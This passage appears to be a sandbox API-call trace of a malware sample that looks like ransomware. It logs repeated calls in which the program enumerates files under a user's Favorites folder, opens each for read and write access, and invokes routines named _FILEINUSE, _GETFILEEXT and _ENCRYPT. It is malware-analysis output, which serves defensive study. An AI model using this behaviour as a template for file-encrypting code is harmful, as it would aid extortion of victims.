wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.635] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.635] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.635] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.635] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.635] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.635] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.637] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.637] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.637] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.637] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.637] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.637] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.638] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.638] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.638] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.638] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.638] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.638] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.640] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.640] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.640] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.641] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.641] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.641] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.641] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.641] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.641] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.641] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.641] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.641] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.641] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.642] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.643] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.643] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.643] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.643] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.643] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.643] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.643] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.643] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.643] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.643] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.643] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.643] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.644] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.644] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.644] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.645] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.645] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.645] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.646] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.646] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.646] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.646] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.646] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.646] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.646] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.646] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.647] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.649] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.649] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.649] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.649] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.649] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.649] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.649] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.649] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.649] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.649] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.649] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.649] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.650] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.650] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.650] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.650] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 0x90add8 [0180.651] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.651] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.651] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 0x90add8 [0180.652] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.652] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.652] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.652] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.652] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.652] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.652] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.652] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.652] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.652] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.652] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.653] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.654] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.654] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.654] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.654] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.654] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.654] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.654] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.654] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.654] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.654] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.654] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.655] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.655] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.655] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.655] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.655] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0x90add8 [0180.656] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.656] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.656] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0x90add8 [0180.657] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.657] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.657] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.657] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.657] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.657] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.657] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.657] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.657] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.657] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.657] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.658] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.660] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.660] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, 